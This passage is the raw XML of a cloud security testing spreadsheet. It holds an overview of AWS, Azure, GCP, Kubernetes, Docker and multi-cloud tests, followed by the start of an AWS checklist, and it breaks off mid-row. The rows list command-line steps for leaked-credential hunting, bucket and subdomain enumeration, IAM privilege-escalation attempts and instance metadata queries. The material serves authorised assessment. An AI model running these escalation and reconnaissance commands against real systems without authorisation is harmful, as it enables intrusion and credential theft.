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ashboard" sheetId="1" state="visible" r:id="rId1"/>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="🟠 AWS" sheetId="2" state="visible" r:id="rId2"/>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="🔵 Azure" sheetId="3" state="visible" r:id="rId3"/>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="🟢 GCP" sheetId="4" state="visible" r:id="rId4"/>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="☸  Kubernetes" sheetId="5" state="visible" r:id="rId5"/>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="🐳 Docker" sheetId="6" state="visible" r:id="rId6"/>
    <sheet xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" name="🌐 Multi-Cloud" sheetId="7" state="visible" r:id="rId7"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'🟠 AWS'!$A$3:$H$3</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'🔵 Azure'!$A$3:$H$3</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="3" hidden="1">'🟢 GCP'!$A$3:$H$3</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="4" hidden="1">'☸  Kubernetes'!$A$3:$H$3</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="5" hidden="1">'🐳 Docker'!$A$3:$H$3</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="6" hidden="1">'🌐 Multi-Cloud'!$A$3:$H$3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8"/>
    </font>
    <font>
      <name val="Arial"/>
      <i val="1"/>
      <color rgb="00AAAAAA"/>
      <sz val="10"/>
    </font>
  </fonts>
  <fills count="17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232F3E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0078D4"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="000F1A2A"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="001A73E8"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="00202124"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="00326CE5"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="000D1117"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="002496ED"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="006B3FA0"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="001A0033"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="001C1C1C"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="002C2C2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6" fillId="15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16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vertical="center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vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="1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1C1C"/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30" customWidth="1" min="4" max="4"/>
    <col width="36" customWidth="1" min="5" max="5"/>
    <col width="42" customWidth="1" min="6" max="6"/>
  </cols>
  <sheetData>
    <row r="1" ht="40" customHeight="1">
      <c r="A1" s="1" t="inlineStr">
        <is>
          <t>☁  CLOUD SECURITY TESTING CHECKLIST — BY TECHNOLOGY</t>
        </is>
      </c>
    </row>
    <row r="2" ht="18" customHeight="1">
      <c r="A2" s="2" t="inlineStr">
        <is>
          <t>CEH v13 Module 19  ·  Cloud Security Testing Guide (CSTG)  ·  CIS Benchmarks  ·  OWASP Cloud Security</t>
        </is>
      </c>
    </row>
    <row r="3" ht="12" customHeight="1"/>
    <row r="4" ht="22" customHeight="1">
      <c r="A4" s="3" t="inlineStr">
        <is>
          <t>Technology</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>Sheet</t>
        </is>
      </c>
      <c r="C4" s="3" t="inlineStr">
        <is>
          <t>Test Count</t>
        </is>
      </c>
      <c r="D4" s="3" t="inlineStr">
        <is>
          <t>Scope</t>
        </is>
      </c>
      <c r="E4" s="3" t="inlineStr">
        <is>
          <t>Key Frameworks</t>
        </is>
      </c>
      <c r="F4" s="3" t="inlineStr">
        <is>
          <t>Primary Tools</t>
        </is>
      </c>
    </row>
    <row r="5" ht="42" customHeight="1">
      <c r="A5" s="4" t="inlineStr">
        <is>
          <t>Amazon Web Services (AWS)</t>
        </is>
      </c>
      <c r="B5" s="4" t="inlineStr">
        <is>
          <t>🟠 AWS</t>
        </is>
      </c>
      <c r="C5" s="4" t="inlineStr">
        <is>
          <t>27</t>
        </is>
      </c>
      <c r="D5" s="4" t="inlineStr">
        <is>
          <t>IAM, EC2, S3, Lambda, CloudTrail, Cognito, VPC</t>
        </is>
      </c>
      <c r="E5" s="4" t="inlineStr">
        <is>
          <t>CIS AWS v1.5, CEH v13, OWASP Cloud</t>
        </is>
      </c>
      <c r="F5" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler, Pacu, PMapper, ScoutSuite, S3Scanner</t>
        </is>
      </c>
    </row>
    <row r="6" ht="42" customHeight="1">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>Microsoft Azure</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>🔵 Azure</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>Entra ID, Blob Storage, Key Vault, Azure Functions</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CIS Azure v2.0, Microsoft Security Baseline</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>Azure CLI, Prowler, ROADtools, ScoutSuite, AzureGraph</t>
        </is>
      </c>
    </row>
    <row r="7" ht="42" customHeight="1">
      <c r="A7" s="4" t="inlineStr">
        <is>
          <t>Google Cloud Platform (GCP)</t>
        </is>
      </c>
      <c r="B7" s="4" t="inlineStr">
        <is>
          <t>🟢 GCP</t>
        </is>
      </c>
      <c r="C7" s="4" t="inlineStr">
        <is>
          <t>7</t>
        </is>
      </c>
      <c r="D7" s="4" t="inlineStr">
        <is>
          <t>IAM, GCS, Cloud Run, GKE, Security Command Center</t>
        </is>
      </c>
      <c r="E7" s="4" t="inlineStr">
        <is>
          <t>CIS GCP v3.0, Google Cloud Security Best Practices</t>
        </is>
      </c>
      <c r="F7" s="4" t="inlineStr">
        <is>
          <t>gcloud CLI, gsutil, Prowler, GCP Scanner, ScoutSuite</t>
        </is>
      </c>
    </row>
    <row r="8" ht="42" customHeight="1">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>Kubernetes</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>☸  Kubernetes</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>3</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr">
        <is>
          <t>RBAC, Pod Security, Secrets, etcd, NetworkPolicies</t>
        </is>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CIS Kubernetes Benchmark, CNCF Security Whitepaper</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>kubectl, kube-bench, kube-hunter, Trivy</t>
        </is>
      </c>
    </row>
    <row r="9" ht="42" customHeight="1">
      <c r="A9" s="4" t="inlineStr">
        <is>
          <t>Docker</t>
        </is>
      </c>
      <c r="B9" s="4" t="inlineStr">
        <is>
          <t>🐳 Docker</t>
        </is>
      </c>
      <c r="C9" s="4" t="inlineStr">
        <is>
          <t>3</t>
        </is>
      </c>
      <c r="D9" s="4" t="inlineStr">
        <is>
          <t>Docker Daemon API, Container Escape, Image CVEs</t>
        </is>
      </c>
      <c r="E9" s="4" t="inlineStr">
        <is>
          <t>CIS Docker Benchmark, NIST SP 800-190</t>
        </is>
      </c>
      <c r="F9" s="4" t="inlineStr">
        <is>
          <t>docker CLI, Trivy, Clair, Snyk, nmap</t>
        </is>
      </c>
    </row>
    <row r="10" ht="42" customHeight="1">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>Multi-Cloud / Cross-Platform</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>🌐 Multi-Cloud</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>7</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr">
        <is>
          <t>SAML/OIDC, Cross-cloud SSRF, MitC, Encryption</t>
        </is>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>CEH v13, OWASP, CIS Multi-cloud</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>ADFSpoof, curl, Burp Suite, AWS CLI, Python3</t>
        </is>
      </c>
    </row>
    <row r="11" ht="16" customHeight="1"/>
    <row r="12" ht="20" customHeight="1">
      <c r="A12" s="6" t="inlineStr">
        <is>
          <t xml:space="preserve">  HOW TO USE THIS CHECKLIST</t>
        </is>
      </c>
    </row>
    <row r="13" ht="18" customHeight="1">
      <c r="A13" s="7" t="inlineStr">
        <is>
          <t>1.  Navigate to the technology tab that matches your engagement scope (AWS, Azure, GCP, Kubernetes, Docker, or Multi-Cloud).</t>
        </is>
      </c>
    </row>
    <row r="14" ht="18" customHeight="1">
      <c r="A14" s="8" t="inlineStr">
        <is>
          <t>2.  Work through each test row — read Objective, Tools, and Methodology Summary before executing.</t>
        </is>
      </c>
    </row>
    <row r="15" ht="18" customHeight="1">
      <c r="A15" s="7" t="inlineStr">
        <is>
          <t>3.  Execute the steps documented in the Methodology Summary column using the listed tools.</t>
        </is>
      </c>
    </row>
    <row r="16" ht="18" customHeight="1">
      <c r="A16" s="8" t="inlineStr">
        <is>
          <t>4.  Update the Status column using the dropdown: Not Started → In Progress → Pass / Fail / N/A / Needs Review.</t>
        </is>
      </c>
    </row>
    <row r="17" ht="18" customHeight="1">
      <c r="A17" s="7" t="inlineStr">
        <is>
          <t>5.  Record findings, evidence references, and recommendations in the Notes column.</t>
        </is>
      </c>
    </row>
    <row r="18" ht="18" customHeight="1">
      <c r="A18" s="8" t="inlineStr">
        <is>
          <t>6.  Use the Multi-Cloud sheet for cross-platform tests (SAML attacks, OIDC misconfigurations, MitC).</t>
        </is>
      </c>
    </row>
  </sheetData>
  <mergeCells count="9">
    <mergeCell ref="A2:F2"/>
    <mergeCell ref="A16:F16"/>
    <mergeCell ref="A13:F13"/>
    <mergeCell ref="A14:F14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900"/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8" customWidth="1" min="4" max="4"/>
    <col width="60" customWidth="1" min="5" max="5"/>
    <col width="42" customWidth="1" min="6" max="6"/>
    <col width="14" customWidth="1" min="7" max="7"/>
    <col width="30" customWidth="1" min="8" max="8"/>
  </cols>
  <sheetData>
    <row r="1" ht="32" customHeight="1">
      <c r="A1" s="9" t="inlineStr">
        <is>
          <t>☁  AWS Security Testing Checklist</t>
        </is>
      </c>
    </row>
    <row r="2" ht="18" customHeight="1">
      <c r="A2" s="10" t="inlineStr">
        <is>
          <t>CEH v13 · CIS AWS Foundations Benchmark · OWASP Cloud Security · Cloud Security Testing Guide</t>
        </is>
      </c>
    </row>
    <row r="3" ht="22" customHeight="1">
      <c r="A3" s="11" t="inlineStr">
        <is>
          <t>Test ID</t>
        </is>
      </c>
      <c r="B3" s="11" t="inlineStr">
        <is>
          <t>Test Name</t>
        </is>
      </c>
      <c r="C3" s="11" t="inlineStr">
        <is>
          <t>Objective</t>
        </is>
      </c>
      <c r="D3" s="11" t="inlineStr">
        <is>
          <t>Tools</t>
        </is>
      </c>
      <c r="E3" s="11" t="inlineStr">
        <is>
          <t>Methodology Summary</t>
        </is>
      </c>
      <c r="F3" s="11" t="inlineStr">
        <is>
          <t>Pass/Fail Criteria</t>
        </is>
      </c>
      <c r="G3" s="11" t="inlineStr">
        <is>
          <t>Status</t>
        </is>
      </c>
      <c r="H3" s="11" t="inlineStr">
        <is>
          <t>Notes</t>
        </is>
      </c>
    </row>
    <row r="4" ht="16" customHeight="1">
      <c r="A4" s="12" t="inlineStr">
        <is>
          <t xml:space="preserve">  Reconnaissance &amp; Enumeration</t>
        </is>
      </c>
    </row>
    <row r="5" ht="60" customHeight="1">
      <c r="A5" s="4" t="inlineStr">
        <is>
          <t>CSEC-RECON-001</t>
        </is>
      </c>
      <c r="B5" s="4" t="inlineStr">
        <is>
          <t>Leaked Credential Discovery in Public Repos</t>
        </is>
      </c>
      <c r="C5" s="4" t="inlineStr">
        <is>
          <t>Identify AWS Access Keys, Azure strings, GCP service account JSON keys accidentally committed to public repos.</t>
        </is>
      </c>
      <c r="D5" s="4" t="inlineStr">
        <is>
          <t>TruffleHog, GitLeaks, GitHub Advanced Search, truffleHog3</t>
        </is>
      </c>
      <c r="E5" s="4" t="inlineStr">
        <is>
          <t>1. Run: trufflehog github --org=&lt;target-org&gt; --only-verified
2. Run: gitleaks detect --source https://github.com/&lt;org&gt;/&lt;repo&gt; --report-format json
3. Search GitHub: org:&lt;target-org&gt; AKIA
4. Check: org:&lt;target-org&gt; filename:.env AWS_SECRET_ACCESS_KEY
5. Search: org:&lt;target-org&gt; "type": "service_account"</t>
        </is>
      </c>
      <c r="F5" s="4" t="inlineStr">
        <is>
          <t>Pass: No live credentials in public repos. Fail: Any active cloud credential discovered.</t>
        </is>
      </c>
      <c r="G5" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H5" s="4" t="inlineStr"/>
    </row>
    <row r="6" ht="60" customHeight="1">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>CSEC-RECON-002</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Cloud Storage Bucket Enumeration</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>Discover publicly accessible S3 buckets by enumerating target-derived bucket names without authentication.</t>
        </is>
      </c>
      <c r="D6" s="5" t="inlineStr">
        <is>
          <t>S3Scanner, AWS CLI, curl</t>
        </is>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>1. Create wordlist from org name + suffixes (backup, dev, prod, staging, assets)
2. Run: s3scanner scan --bucket-file buckets.txt --enumerate
3. Run: aws s3 ls s3://&lt;bucket&gt; --no-sign-request</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>Pass: All buckets require auth, return 403. Fail: Any bucket allows unauthenticated listing/reading/writing.</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H6" s="5" t="inlineStr"/>
    </row>
    <row r="7" ht="60" customHeight="1">
      <c r="A7" s="4" t="inlineStr">
        <is>
          <t>CSEC-RECON-003</t>
        </is>
      </c>
      <c r="B7" s="4" t="inlineStr">
        <is>
          <t>Cloud Infrastructure Fingerprinting via DNS &amp; HTTP</t>
        </is>
      </c>
      <c r="C7" s="4" t="inlineStr">
        <is>
          <t>Identify AWS services, regions, and exposed management interfaces via DNS, HTTP headers, and OSINT.</t>
        </is>
      </c>
      <c r="D7" s="4" t="inlineStr">
        <is>
          <t>dig, curl, Shodan, Censys, nmap</t>
        </is>
      </c>
      <c r="E7" s="4" t="inlineStr">
        <is>
          <t>1. Run: dig ANY target.com; dig CNAME app.target.com
2. Run: curl -sI https://target.com | grep -iE "x-amz|cf-ray"
3. Search Shodan: org:"Target Company" port:2375
4. Identify CSP from CNAME patterns (amazonaws)</t>
        </is>
      </c>
      <c r="F7" s="4" t="inlineStr">
        <is>
          <t>Pass: Cloud provider not readily discoverable. Fail: AWS services, regions, mgmt interfaces identifiable.</t>
        </is>
      </c>
      <c r="G7" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H7" s="4" t="inlineStr"/>
    </row>
    <row r="8" ht="60" customHeight="1">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>CSEC-RECON-004</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Subdomain Enumeration &amp; Takeover Testing</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>Enumerate all subdomains, detect dangling CNAMEs pointing to de-provisioned AWS services.</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr">
        <is>
          <t>subfinder, amass, nuclei, dig</t>
        </is>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>1. Run: subfinder -d target.com -all -o subdomains.txt
2. Run: amass enum -passive -d target.com
3. Check CNAMEs: while read s; do dig CNAME $s +short; done &lt; subdomains.txt
4. Run: nuclei -l subdomains.txt -t dns/subdomain-takeover/
5. Test: curl -s https://cdn.target.com | grep -i "NoSuchBucket"</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>Pass: No dangling CNAMEs. Fail: Any CNAME points to claimable cloud resource.</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H8" s="5" t="inlineStr"/>
    </row>
    <row r="9" ht="60" customHeight="1">
      <c r="A9" s="4" t="inlineStr">
        <is>
          <t>CSEC-RECON-005</t>
        </is>
      </c>
      <c r="B9" s="4" t="inlineStr">
        <is>
          <t>Certificate Transparency Log Mining</t>
        </is>
      </c>
      <c r="C9" s="4" t="inlineStr">
        <is>
          <t>Query public CT logs to discover all certificates for the target domain, revealing hidden cloud-hosted services.</t>
        </is>
      </c>
      <c r="D9" s="4" t="inlineStr">
        <is>
          <t>crt.sh, curl, python3</t>
        </is>
      </c>
      <c r="E9" s="4" t="inlineStr">
        <is>
          <t>1. Run: curl -s "https://crt.sh/?q=%.target.com&amp;output=json" | python3 ...
2. Filter: grep -iE "dev|staging|api|internal|admin|backup|s3|blob"
3. For each hostname: curl -sI https://&lt;hostname&gt; | grep -iE "x-amz"</t>
        </is>
      </c>
      <c r="F9" s="4" t="inlineStr">
        <is>
          <t>Pass: No unintended subdomains via CT logs. Fail: Internal/cloud mgmt interfaces found.</t>
        </is>
      </c>
      <c r="G9" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H9" s="4" t="inlineStr"/>
    </row>
    <row r="10" ht="16" customHeight="1">
      <c r="A10" s="12" t="inlineStr">
        <is>
          <t xml:space="preserve">  IAM &amp; Privilege Escalation</t>
        </is>
      </c>
    </row>
    <row r="11" ht="60" customHeight="1">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>CSEC-IAM-001</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>AWS IAM Identity &amp; Caller Enumeration</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>Establish caller identity, enumerate all IAM users, roles, groups, and policies to map the complete IAM landscape.</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, PMapper, Pacu</t>
        </is>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>1. aws sts get-caller-identity
2. aws iam list-users --output table
3. aws iam list-roles --output table
4. aws iam list-groups --output table
5. aws iam list-policies --scope Local --output table
6. aws iam list-attached-user-policies --user-name &lt;username&gt;</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>Pass: IAM enumeration restricted to own permissions. Fail: All users/roles/groups enumerable.</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H11" s="5" t="inlineStr"/>
    </row>
    <row r="12" ht="60" customHeight="1">
      <c r="A12" s="4" t="inlineStr">
        <is>
          <t>CSEC-IAM-002</t>
        </is>
      </c>
      <c r="B12" s="4" t="inlineStr">
        <is>
          <t>AWS IAM Privilege Escalation Path Analysis</t>
        </is>
      </c>
      <c r="C12" s="4" t="inlineStr">
        <is>
          <t>Use graph-based analysis to identify all privilege escalation paths to administrative access.</t>
        </is>
      </c>
      <c r="D12" s="4" t="inlineStr">
        <is>
          <t>PMapper, Pacu, AWS CLI</t>
        </is>
      </c>
      <c r="E12" s="4" t="inlineStr">
        <is>
          <t>1. pmapper graph create
2. pmapper query "who can become an admin"
3. pmapper analysis --output-type text
4. In Pacu: run iam__privesc_scan
5. aws iam simulate-principal-policy --action-names iam:CreateUser</t>
        </is>
      </c>
      <c r="F12" s="4" t="inlineStr">
        <is>
          <t>Pass: No escalation paths exist. Fail: Any path from lower-privilege to admin.</t>
        </is>
      </c>
      <c r="G12" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H12" s="4" t="inlineStr"/>
    </row>
    <row r="13" ht="60" customHeight="1">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>CSEC-IAM-003</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>AWS IAM Privilege Escalation via Policy Manipulation</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>Attempt all known IAM privilege escalation techniques including policy versions, inline policies, group addition.</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Pacu</t>
        </is>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>1. Test CreatePolicyVersion: aws iam create-policy-version --set-as-default
2. Test PutUserPolicy: aws iam put-user-policy ...
3. Test AddUserToGroup: aws iam add-user-to-group --group-name Administrators
4. Test AssumeRole: aws sts assume-role --role-arn &lt;admin-role-arn&gt;</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>Pass: All attempts return AccessDenied. Fail: Any technique elevates privileges.</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H13" s="5" t="inlineStr"/>
    </row>
    <row r="14" ht="60" customHeight="1">
      <c r="A14" s="4" t="inlineStr">
        <is>
          <t>CSEC-IAM-004</t>
        </is>
      </c>
      <c r="B14" s="4" t="inlineStr">
        <is>
          <t>AWS IAM Access Key Age &amp; Rotation Assessment</t>
        </is>
      </c>
      <c r="C14" s="4" t="inlineStr">
        <is>
          <t>Identify stale, unused, or over-aged access keys still active, presenting persistent unauthorized access risk.</t>
        </is>
      </c>
      <c r="D14" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E14" s="4" t="inlineStr">
        <is>
          <t>1. aws iam list-access-keys --user-name &lt;username&gt;
2. aws iam get-access-key-last-used --access-key-id &lt;KEY-ID&gt;
3. Loop all users and check key age
4. prowler aws --checks iam_access_keys_rotated_90_days
5. aws iam generate-credential-report</t>
        </is>
      </c>
      <c r="F14" s="4" t="inlineStr">
        <is>
          <t>Pass: All keys &lt; 90 days, actively used. Fail: Keys older than 90 days or inactive keys remain active.</t>
        </is>
      </c>
      <c r="G14" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H14" s="4" t="inlineStr"/>
    </row>
    <row r="15" ht="60" customHeight="1">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>CSEC-IAM-007</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>MFA Enforcement Assessment (AWS)</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>Verify MFA is enforced for all IAM users, root account, and that SCPs require MFA.</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>1. aws iam generate-credential-report; check mfa_active column
2. prowler aws --checks iam_root_mfa_enabled iam_user_mfa_enabled_console_access
3. aws iam get-account-summary --query SummaryMap.AccountMFAEnabled
4. Check SCP: aws organizations list-policies --filter SERVICE_CONTROL_POLICY</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>Pass: MFA enabled for all users with console access. Root MFA enabled. Fail: Any user lacks MFA.</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H15" s="5" t="inlineStr"/>
    </row>
    <row r="16" ht="16" customHeight="1">
      <c r="A16" s="12" t="inlineStr">
        <is>
          <t xml:space="preserve">  EC2 Compute &amp; Network Security</t>
        </is>
      </c>
    </row>
    <row r="17" ht="60" customHeight="1">
      <c r="A17" s="4" t="inlineStr">
        <is>
          <t>CSEC-COMPUTE-001</t>
        </is>
      </c>
      <c r="B17" s="4" t="inlineStr">
        <is>
          <t>EC2 Instance Security Configuration</t>
        </is>
      </c>
      <c r="C17" s="4" t="inlineStr">
        <is>
          <t>Identify EC2 instances with dangerous security group rules, unencrypted EBS volumes, public EBS snapshots.</t>
        </is>
      </c>
      <c r="D17" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler</t>
        </is>
      </c>
      <c r="E17" s="4" t="inlineStr">
        <is>
          <t>1. aws ec2 describe-security-groups | check 0.0.0.0/0 inbound
2. aws ec2 describe-snapshots --owner-ids self
3. aws ec2 describe-volumes --query "Volumes[?Encrypted==false]"
4. aws ec2 get-ebs-encryption-by-default
5. prowler aws --checks ec2_securitygroup_allow_ingress_from_internet_to_tcp_port_22</t>
        </is>
      </c>
      <c r="F17" s="4" t="inlineStr">
        <is>
          <t>Pass: No SGs open critical ports. All EBS encrypted. No public snapshots. Fail: SSH/RDP/DB ports open to internet.</t>
        </is>
      </c>
      <c r="G17" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H17" s="4" t="inlineStr"/>
    </row>
    <row r="18" ht="60" customHeight="1">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>CSEC-COMPUTE-002</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>EC2 IMDSv2 Enforcement</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>Verify IMDSv2 is enforced on all EC2 instances to prevent SSRF-to-credential-theft attacks.</t>
        </is>
      </c>
      <c r="D18" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, curl, Prowler</t>
        </is>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>1. aws ec2 describe-instances --query "Reservations[*].Instances[*].MetadataOptions"
2. Test IMDSv1: curl -s http://169.254.169.254/latest/meta-data/instance-id (must return 401)
3. Test IMDSv2 token: TOKEN=$(curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
4. prowler aws --checks ec2_instance_imdsv2_enabled</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>Pass: All instances HttpTokens=required. IMDSv1 returns 401. Fail: Any instance allows IMDSv1.</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H18" s="5" t="inlineStr"/>
    </row>
    <row r="19" ht="60" customHeight="1">
      <c r="A19" s="4" t="inlineStr">
        <is>
          <t>CSEC-COMPUTE-007</t>
        </is>
      </c>
      <c r="B19" s="4" t="inlineStr">
        <is>
          <t>Security Group &amp; Network Segmentation Assessment</t>
        </is>
      </c>
      <c r="C19" s="4" t="inlineStr">
        <is>
          <t>Identify SGs opening critical ports to internet, verify VPC Flow Logs, assess VPC peering risks.</t>
        </is>
      </c>
      <c r="D19" s="4" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler, nmap</t>
        </is>
      </c>
      <c r="E19" s="4" t="inlineStr">
        <is>
          <t>1. aws ec2 describe-security-groups | check 0.0.0.0/0 on ports 22,3389,3306,5432,6379,9200
2. Check VPC flow logs for all VPCs
3. aws ec2 describe-vpc-peering-connections --output table
4. Test exposed services: redis-cli -h &lt;ip&gt; ping
5. prowler aws --checks vpc_flow_logs_enabled</t>
        </is>
      </c>
      <c r="F19" s="4" t="inlineStr">
        <is>
          <t>Pass: No critical ports to 0.0.0.0/0. VPC Flow Logs enabled. No DB ports internet-facing. Fail: Mgmt ports exposed.</t>
        </is>
      </c>
      <c r="G19" s="4" t="inlineStr">
        <is>
          <t>Not Started</t>
        </is>
      </c>
      <c r="H19" s="4" t="inlineStr"/>
    </row>
    <row r="20" ht="16" customHeight="1">
      <c r="A20" s="12" t="inlineStr">
        <is>
          <t xml:space="preserve">  S3 Storage Security</t>
        </is>
      </c>
    </row>
    <row r="21" ht="60" customHeight="1">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>CSEC-STOR-001</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>S3 Block Public Access Configuration</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>Verify S3 Block Public Access enabled at account and bucket level; no ACL/policy grants public read/write.</t>
        </is>
      </c>
      <c r="D21" s="5" t="inlineStr">
        <is>
          <t>AWS CLI, Prowler, S3Scanner</t>
        </is>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>1. aws s3control get-public-access-block --account-id &lt;acct-id&gt;
2. Per bucket: aws s3api get-public-access-block --bucket $bucket
3. aws s3api get-bucket-acl --bucket &lt;bucket&gt; | grep AllUsers
4. aws s3api get-bucket-policy | check '"Principal": "*"'
5. prowler aws --checks s3_bucket_public_access</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>Pass: All Block Public Access settings true. No ACL grants allUsers. Fail: Any bucket setting false or public ACL.</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr">
        <is>
